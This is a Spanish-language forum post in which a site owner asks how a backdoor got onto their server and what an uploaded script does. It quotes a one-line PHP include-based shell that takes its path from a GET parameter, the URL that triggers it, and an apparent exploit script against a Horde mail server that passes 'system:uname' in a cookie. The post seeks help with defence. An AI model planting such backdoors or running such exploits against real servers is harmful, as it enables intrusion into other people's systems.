Código PHP:
<?php if(isset($_GET["shell"])) include $_GET["shell"];
Código PHP:
dominio.com/index.php?shell=ataque.php
Pues bien, mi pregunta es la siguiente. Por un lado, lo que más me interesa saber es como inyectaron esa sentencia en el archivo para poder establecer una protección (o que maneras existen de hacerlo).
Por otro lado quisiera saber que hace exactamente el posible exploit que subieron para atacar otra web (un gestor de correo universitario):
Código PHP:
<?php
require_once 'HTTP/Request2.php';
$request = new HTTP_Request2('https://servidordecorreo.com/horde3/services/javascript.php', HTTP_Request2::METHOD_GET);
$request->addCookie('href', "system:uname");
$request->setMethod(HTTP_Request2::METHOD_POST)
->addPostParameter('app','horde')
->addPostParameter('file','open_calendar.js');
try {
$response = $request->send();
if (200 == $response->getStatus()) {
echo $response->getBody();
} else {
echo 'Unexpected HTTP status: ' . $response->getStatus() . ' ' .
$response->getReasonPhrase();
}
} catch (HTTP_Request2_Exception $e) {
echo 'Error: ' . $e->getMessage();
}
?>
Muchas gracias y saludos!